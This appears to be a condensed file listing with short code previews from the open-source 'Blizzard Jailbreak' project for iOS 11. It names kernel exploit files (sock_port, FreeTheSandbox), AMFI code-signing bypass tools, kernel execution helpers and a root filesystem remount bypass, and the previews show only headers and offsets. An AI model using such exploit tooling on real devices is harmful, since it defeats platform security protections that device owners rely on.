method dumpcopydata (line 149) | void dumpcopydata()
method addtodict (line 156) | void addtodict(uint8_t c)
method nextflagbit (line 161) | void nextflagbit()
method setcounter (line 167) | void setcounter(uint8_t first, uint8_t second)
function usage (line 174) | void usage(int argc,char**argv)
function lzssdec (line 180) | int lzssdec(int argc,char**argv)
FILE: PatchFinder/patchfinder64.h
type addr_t (line 7) | typedef unsigned long long addr_t;
Condensed preview of 102 files, each entry showing the path, character count, and a content snippet; the full structured content is 892K chars.
[
{
"path": ".gitignore",
"chars": 10,
"preview": ".DS_Store\n"
},
{
"path": "AMFI Utilities/amfi_utils.h",
"chars": 943,
"preview": "#import <stdio.h>\n#import <sys/types.h>\n#import \"../AMFI Utilities/cs_blob.h\"\n\n#define MACHO(p) ((*(unsigned int *)(p) &"
},
{
"path": "AMFI Utilities/amfi_utils.m",
"chars": 15027,
"preview": "// Comes from Electra, adapted for FAT binary support by Jake James\n//\n// amfi_utils.c\n// electra\n//\n// Created by J"
},
{
"path": "AMFI Utilities/amfid.h",
"chars": 1025,
"preview": "#import <dlfcn.h>\n#import <stdio.h>\n#import <unistd.h>\n#import <sys/types.h>\n#import <mach/mach.h>\n#import <mach-o/loade"
},
{
"path": "AMFI Utilities/amfid.m",
"chars": 10116,
"preview": "// From JelbrekLib, by Jake James!\n\n#import \"../AMFI Utilities/amfid.h\"\n#import \"../AMFI Utilities/amfid_mem.h\"\n#import "
},
{
"path": "AMFI Utilities/amfid_mem.h",
"chars": 454,
"preview": "#import <stdio.h>\n#import <mach-o/loader.h>\n#import <stdlib.h>\n#import <fcntl.h>\n#import <unistd.h>\n#import <errno.h>\n#i"
},
{
"path": "AMFI Utilities/amfid_mem.m",
"chars": 1402,
"preview": "#import \"amfid_mem.h\"\n#import \"kernel_utils.h\"\n#import <Foundation/Foundation.h>\n\nstatic mach_port_t amfid_task_port;\n\nv"
},
{
"path": "AMFI Utilities/amfid_tools.h",
"chars": 497,
"preview": "#import <stdio.h>\n#import <unistd.h>\n#import <sys/types.h>\n#import <mach-o/loader.h>\n#import <mach/error.h>\n#import <err"
},
{
"path": "AMFI Utilities/amfid_tools.m",
"chars": 2261,
"preview": "#import \"amfid_tools.h\"\n#import \"amfi_utils.h\"\n#import \"amfid.h\"\n\nstatic unsigned int hash_rank(const CodeDirectory *cd)"
},
{
"path": "AMFI Utilities/cs_blob.h",
"chars": 9611,
"preview": "//from: xnu osfmk/kern/cs_blobs.h\n\n#import <mach/mach.h>\n\ntypedef struct __attribute__((packed)) {\n uint32_t magic; "
},
{
"path": "AMFI Utilities/osobject.c",
"chars": 4363,
"preview": "#import <stdlib.h>\n#import \"../Kernel Utilities/kexecute.h\"\n#import \"../Kernel Utilities/kernel_utils.h\"\n#import \"../Pat"
},
{
"path": "AMFI Utilities/osobject.h",
"chars": 1099,
"preview": "#include \"../Exploits/sock_port/kernel_memory.h\"\n\n#define OSDictionary_ItemCount(dict) rk32(dict+20)\n#define OSDictionar"
},
{
"path": "APFS Utilities/IOKit.h",
"chars": 2399,
"preview": "//\n// IOKit.h\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 08/10/2020.\n// Copyright © 2020 Blizzard Jailbreak. "
},
{
"path": "APFS Utilities/liboffsetfinder64.hpp",
"chars": 6264,
"preview": "//\n// offsetfinder64.hpp\n// offsetfinder64\n//\n// Created by tihmstar on 10.01.18.\n// Copyright © 2018 tihmstar. All "
},
{
"path": "APFS Utilities/offsetfinder.cpp",
"chars": 1692,
"preview": "// Based on tihmstar's liboffsetfinder64 which is open source here:\n// https://github.com/tihmstar/liboffsetfinder64\n// "
},
{
"path": "APFS Utilities/rootfs_remount.h",
"chars": 562,
"preview": "//\n// rootfs_remount.h\n// electra1131\n//\n// Created by CoolStar on 6/7/18.\n// Copyright © 2018 CoolStar. All rights "
},
{
"path": "APFS Utilities/rootfs_remount.m",
"chars": 11621,
"preview": "// Thanks to the Electra Team and Pwn20wnd!\n/* APFS snapshot mitigation bypass bug by CoolStar, exploitation by Pwn20wnd"
},
{
"path": "APFS Utilities/snapshot_tools.c",
"chars": 5738,
"preview": "#import \"../Kernel Utilities/kernel_utils.h\"\n#import \"../PatchFinder/patchfinder64.h\"\n#import \"../Exploits/sock_port/off"
},
{
"path": "APFS Utilities/snapshot_tools.h",
"chars": 611,
"preview": "#ifndef apfs_util_h\n#define apfs_util_h\n\n#define get_dirfd(vol) open(vol, O_RDONLY, 0)\n\nchar *find_snapshot_with_ref(con"
},
{
"path": "Blizzard Jailbreak/AppDelegate.h",
"chars": 277,
"preview": "//\n// AppDelegate.h\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All rights "
},
{
"path": "Blizzard Jailbreak/AppDelegate.m",
"chars": 1973,
"preview": "//\n// AppDelegate.m\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All rights "
},
{
"path": "Blizzard Jailbreak/Assets.xcassets/AppIcon.appiconset/Contents.json",
"chars": 3147,
"preview": "{\n \"images\" : [\n {\n \"size\" : \"20x20\",\n \"idiom\" : \"iphone\",\n \"filename\" : \"notification-icon@2x.png\",\n"
},
{
"path": "Blizzard Jailbreak/Assets.xcassets/Contents.json",
"chars": 62,
"preview": "{\n \"info\" : {\n \"version\" : 1,\n \"author\" : \"xcode\"\n }\n}"
},
{
"path": "Blizzard Jailbreak/Assets.xcassets/button_mask.imageset/Contents.json",
"chars": 388,
"preview": "{\n \"images\" : [\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"button_mask.png\",\n \"scale\" : \"1x\"\n },\n "
},
{
"path": "Blizzard Jailbreak/Assets.xcassets/jailbreak_wallpaper.imageset/Contents.json",
"chars": 412,
"preview": "{\n \"images\" : [\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"jailbreak_wallpaper.png\",\n \"scale\" : \"1x\"\n "
},
{
"path": "Blizzard Jailbreak/Assets.xcassets/snow.imageset/Contents.json",
"chars": 367,
"preview": "{\n \"images\" : [\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"snow.png\",\n \"scale\" : \"1x\"\n },\n {\n "
},
{
"path": "Blizzard Jailbreak/Assets.xcassets/winter.imageset/Contents.json",
"chars": 373,
"preview": "{\n \"images\" : [\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"winter.png\",\n \"scale\" : \"1x\"\n },\n {\n "
},
{
"path": "Blizzard Jailbreak/Base.lproj/LaunchScreen.storyboard",
"chars": 4430,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<document type=\"com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB\" version=\"3"
},
{
"path": "Blizzard Jailbreak/Base.lproj/Main.storyboard",
"chars": 39830,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<document type=\"com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB\" version=\"3"
},
{
"path": "Blizzard Jailbreak/BlizzardLog.h",
"chars": 462,
"preview": "//\n// BlizzardLog.h\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/10/20.\n// Copyright © 2020 GeoSn0w. All righ"
},
{
"path": "Blizzard Jailbreak/BlizzardLog.m",
"chars": 6215,
"preview": "//\n// BlizzardLog.m\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/10/20.\n// Copyright © 2020 GeoSn0w. All righ"
},
{
"path": "Blizzard Jailbreak/BlizzardSpawnerTools.c",
"chars": 938,
"preview": "//\n// BlizzardSpawnerTools.c\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/11/20.\n// Copyright © 2020 GeoSn0w."
},
{
"path": "Blizzard Jailbreak/BlizzardSpawnerTools.h",
"chars": 385,
"preview": "//\n// BlizzardSpawnerTools.h\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/11/20.\n// Copyright © 2020 GeoSn0w."
},
{
"path": "Blizzard Jailbreak/Info.plist",
"chars": 1592,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/P"
},
{
"path": "Blizzard Jailbreak/blizzardJailbreak.h",
"chars": 785,
"preview": "//\n// blizzardJailbreak.h\n//\n// Created by GeoSn0w on 8/10/20.\n// Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n"
},
{
"path": "Blizzard Jailbreak/blizzardJailbreak.m",
"chars": 10319,
"preview": "//\n// blizzardJailbreak.c\n//\n// Created by GeoSn0w on 8/10/20.\n// Copyright © 2020 GeoSn0w. All rights reserved.\n//\n#"
},
{
"path": "Blizzard Jailbreak/blizzardView.h",
"chars": 422,
"preview": "//\n// blizzardView.h\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/10/20.\n// Copyright © 2020 GeoSn0w. All rig"
},
{
"path": "Blizzard Jailbreak/blizzardView.m",
"chars": 1489,
"preview": "//\n// blizzardView.m\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/10/20.\n// Copyright © 2020 GeoSn0w. All rig"
},
{
"path": "Blizzard Jailbreak/main.m",
"chars": 334,
"preview": "//\n// main.m\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All rights reserve"
},
{
"path": "Blizzard Jailbreak.xcodeproj/project.pbxproj",
"chars": 53769,
"preview": "// !$*UTF8*$!\n{\n\tarchiveVersion = 1;\n\tclasses = {\n\t};\n\tobjectVersion = 48;\n\tobjects = {\n\n/* Begin PBXBuildFile section *"
},
{
"path": "Blizzard Jailbreak.xcodeproj/project.xcworkspace/contents.xcworkspacedata",
"chars": 208,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Workspace\n version = \"1.0\">\n <FileRef\n location = \"self:/Users/geosn0w/"
},
{
"path": "Blizzard Jailbreak.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist",
"chars": 238,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/P"
},
{
"path": "Blizzard Jailbreak.xcodeproj/xcshareddata/xcschemes/sock_port.xcscheme",
"chars": 4365,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Scheme\n LastUpgradeVersion = \"1010\"\n version = \"1.3\">\n <BuildAction\n "
},
{
"path": "Blizzard Jailbreak.xcodeproj/xcuserdata/geosn0w.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist",
"chars": 91,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Bucket\n type = \"1\"\n version = \"2.0\">\n</Bucket>\n"
},
{
"path": "Blizzard Jailbreak.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist",
"chars": 2112,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Bucket\n type = \"1\"\n version = \"2.0\">\n <Breakpoints>\n <BreakpointProxy"
},
{
"path": "Blizzard Jailbreak.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcschemes/xcschememanagement.plist",
"chars": 334,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/P"
},
{
"path": "Blizzard Jailbreak.xcodeproj/xcuserdata/pwn20wnd.xcuserdatad/xcschemes/xcschememanagement.plist",
"chars": 673,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/P"
},
{
"path": "Exploits/FreeTheSandbox/IOTypes.h",
"chars": 7079,
"preview": "/*\n * Copyright (c) 1998-2012 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n "
},
{
"path": "Exploits/FreeTheSandbox/freethesandbox.h",
"chars": 253,
"preview": "//\n// freethesandbox.h\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 11/20/20.\n// Copyright © 2020 GeoSn0w. All "
},
{
"path": "Exploits/FreeTheSandbox/ios13_change_offsets.m",
"chars": 18519,
"preview": "//\n// ios13_change_offsets.c\n// ios13_app1\n//\n// Created by bb on 1/25/20.\n// Copyright © 2020 bb. All rights reserv"
},
{
"path": "Exploits/FreeTheSandbox/ios13_kernel_universal.c",
"chars": 115429,
"preview": "//\n// ios13_kernel_universal.c\n// ios13_app1\n//\n// Created by bb on 1/12/20.\n// Copyright © 2020 bb. All rights rese"
},
{
"path": "Exploits/FreeTheSandbox/ios13_userspace.c",
"chars": 42515,
"preview": "//\n// ios13_userspace.c\n// ios13_app1\n//\n// Created by bb on 1/12/20.\n// Copyright © 2020 bb. All rights reserved.\n/"
},
{
"path": "Exploits/FreeTheSandbox/ios13_userspace_pac.c",
"chars": 37421,
"preview": "//\n// ios13_userspace_pac.c\n// ios13_app1\n//\n// Created by bb on 1/12/20.\n// Copyright © 2020 bb. All rights reserve"
},
{
"path": "Exploits/FreeTheSandbox/ios_7st_utils.m",
"chars": 4573,
"preview": "//\n// ios_7st_utils.c\n// ios_7st_test\n//\n// Created by bb on 12/26/19.\n// Copyright © 2019 bb. All rights reserved.\n"
},
{
"path": "Exploits/FreeTheSandbox/libsnappy.c",
"chars": 5260,
"preview": "//\n// libsnappy.c\n// ios_7st_test\n//\n// Created by bb on 1/20/20.\n// Copyright © 2020 bb. All rights reserved.\n//\n\n/"
},
{
"path": "Exploits/FreeTheSandbox/libsnappy.h",
"chars": 340,
"preview": "//\n// libsnappy.h\n// ios_7st_test\n//\n// Created by bb on 1/20/20.\n// Copyright © 2020 bb. All rights reserved.\n//\n\n/"
},
{
"path": "Exploits/FreeTheSandbox/vnode.h",
"chars": 3661,
"preview": "#import <sys/mount.h>\n#import <sys/event.h>\n\ntypedef struct {\n union {\n uint64_t lck_mtx_data;\n uint64_"
},
{
"path": "Exploits/FreeTheSandbox/xpc.h",
"chars": 2658,
"preview": "//\n// xpc.h\n// D22_final_iOS\n//\n// Created by aa on 3/23/19.\n// Copyright © 2019 aa. All rights reserved.\n//\n\n#ifnde"
},
{
"path": "Exploits/IOKit/IOKitKeys.h",
"chars": 7728,
"preview": "/*\n * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n "
},
{
"path": "Exploits/IOKit/IOKitLib.h",
"chars": 86627,
"preview": "/*\n * Copyright (c) 1998-2014 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_LICENSE_HEADER_START@\n *\n * This fi"
},
{
"path": "Exploits/IOKit/IOReturn.h",
"chars": 8101,
"preview": "/*\n * Copyright (c) 1998-2002 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n "
},
{
"path": "Exploits/IOKit/IOTypes.h",
"chars": 7079,
"preview": "/*\n * Copyright (c) 1998-2012 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n "
},
{
"path": "Exploits/sock_port/exploit.c",
"chars": 20671,
"preview": "//\n// exploit.c\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All rights rese"
},
{
"path": "Exploits/sock_port/exploit.h",
"chars": 3454,
"preview": "//\n// exploit.h\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All rights rese"
},
{
"path": "Exploits/sock_port/exploit_utilities.c",
"chars": 5610,
"preview": "//\n// exploit_utilities.c\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All r"
},
{
"path": "Exploits/sock_port/exploit_utilities.h",
"chars": 2026,
"preview": "//\n// exploit_utilities.h\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All r"
},
{
"path": "Exploits/sock_port/include/IOKit/IOKitKeys.h",
"chars": 6749,
"preview": "/*\n * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n "
},
{
"path": "Exploits/sock_port/include/IOKit/IOKitLib.h",
"chars": 68790,
"preview": "/*\n * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_LICENSE_HEADER_START@\n * \n * The co"
},
{
"path": "Exploits/sock_port/include/IOKit/IOReturn.h",
"chars": 7526,
"preview": "/*\n * Copyright (c) 1998-2002 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n "
},
{
"path": "Exploits/sock_port/include/IOKit/IOTypes.h",
"chars": 6038,
"preview": "/*\n * Copyright (c) 1998-2006 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n "
},
{
"path": "Exploits/sock_port/include/IOKit/OSMessageNotification.h",
"chars": 3086,
"preview": "/*\n * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_LICENSE_HEADER_START@\n * \n * This f"
},
{
"path": "Exploits/sock_port/iosurface.c",
"chars": 12616,
"preview": "/*\n * iosurface.c\n * Brandon Azad\n */\n#define IOSURFACE_EXTERN\n#include \"iosurface.h\"\n\n// ---- Global variables --------"
},
{
"path": "Exploits/sock_port/iosurface.h",
"chars": 3823,
"preview": "/*\n * iosurface.h\n * Brandon Azad\n */\n#ifndef VOUCHER_SWAP__IOSURFACE_H_\n#define VOUCHER_SWAP__IOSURFACE_H_\n\n#include <m"
},
{
"path": "Exploits/sock_port/kernel_memory.c",
"chars": 2548,
"preview": "//\n// kernel_memory.c\n// sock_port\n//\n// Created by Jake James on 7/18/19.\n// Copyright © 2019 Jake James. All right"
},
{
"path": "Exploits/sock_port/kernel_memory.h",
"chars": 1379,
"preview": "//\n// kernel_memory.h\n// sock_port\n//\n// Created by Jake James on 7/18/19.\n// Copyright © 2019 Jake James. All right"
},
{
"path": "Exploits/sock_port/offsetof.c",
"chars": 3354,
"preview": "unsigned off_p_pid = 0x10; // proc_t::p_pid\nunsigned off_task = 0x18; // proc_t::task\nunsig"
},
{
"path": "Exploits/sock_port/offsetof.h",
"chars": 3522,
"preview": "\nextern unsigned off_p_pid;\nextern unsigned off_task;\nextern unsigned off_p_uid;\nextern unsigned off_p_gid;\nextern unsig"
},
{
"path": "Exploits/sock_port/offsets.h",
"chars": 1438,
"preview": "#ifndef offsets_h\n#define offsets_h\n\nenum kstruct_offset {\n /* struct task */\n KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,\n "
},
{
"path": "Exploits/sock_port/offsets.m",
"chars": 7863,
"preview": "#import <Foundation/Foundation.h>\n#import <UIKit/UIKit.h>\n\n#import <stdio.h>\n#import <stdlib.h>\n#import <string.h>\n#impo"
},
{
"path": "Kernel Utilities/kernSymbolication.c",
"chars": 6412,
"preview": "//\n// kernelSymbolFinder.c\n// KernelSymbolFinder\n//\n// Created by Jake James on 8/21/18.\n// Copyright © 2018 Jake Ja"
},
{
"path": "Kernel Utilities/kernSymbolication.h",
"chars": 753,
"preview": "//\n// kernSymbolication.h\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/11/20.\n// Copyright © 2020 GeoSn0w. Al"
},
{
"path": "Kernel Utilities/kernel_utils.h",
"chars": 2277,
"preview": "#ifndef kernUtils_h\n#define kernUtils_h\n#import <stdio.h>\n#import <mach-o/loader.h>\n#import <stdlib.h>\n#import <fcntl.h>"
},
{
"path": "Kernel Utilities/kernel_utils.m",
"chars": 12914,
"preview": "\n#import \"kernel_utils.h\"\n#import \"../PatchFinder/patchfinder64.h\"\n#import \"../Exploits/sock_port/offsetof.h\"\n#import \"."
},
{
"path": "Kernel Utilities/kexecute.c",
"chars": 3276,
"preview": "#import <pthread.h>\n#import \"kernel_utils.h\"\n#import \"kexecute.h\"\n#import \"../PatchFinder/patchfinder64.h\"\n#import \"../E"
},
{
"path": "Kernel Utilities/kexecute.h",
"chars": 240,
"preview": "#import <mach/mach.h>\n#import <inttypes.h>\n\nuint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint"
},
{
"path": "Kernel Utilities/lzssdec.cpp",
"chars": 8042,
"preview": "//\n// lzssdec.cpp\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/11/20.\n// Copyright © 2020 GeoSn0w. All rights"
},
{
"path": "Kernel Utilities/lzssdec.hpp",
"chars": 336,
"preview": "//\n// lzssdec.hpp\n// KernelSymbolFinder\n//\n// Created by Jake James on 8/21/18.\n// Copyright © 2018 Jake James. All "
},
{
"path": "Kernel Utilities/system_reboot.h",
"chars": 6016,
"preview": "/*\n * Copyright (c) 2000-2006 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n "
},
{
"path": "LICENSE",
"chars": 35149,
"preview": " GNU GENERAL PUBLIC LICENSE\n Version 3, 29 June 2007\n\n Copyright (C) 2007 Free "
},
{
"path": "PatchFinder/patchfinder64.h",
"chars": 1733,
"preview": "#ifndef patchfinder_h\n#define patchfinder_h\n#import <stdint.h>\n#import <string.h>\n#import <stdbool.h>\n#import <mach-o/fa"
},
{
"path": "PatchFinder/patchfinder64.m",
"chars": 54620,
"preview": "\n//\n// patchfinder64.c\n// extra_recipe\n//\n// Created by xerub on 06/06/2017.\n// Copyright © 2017 xerub. All rights r"
},
{
"path": "README.md",
"chars": 1369,
"preview": "# Blizzard Jailbreak\nAn Open-Source iOS 11.0 to 11.4.1 Jailbreak. \n\nThis jailbreak is aimed at the beginner Jailbreak De"
},
{
"path": "Vanity/readme.md",
"chars": 64,
"preview": "This folder contains the logo, wallpapers and other press kits.\n"
}
]
// ... and 9 more files (download for full content)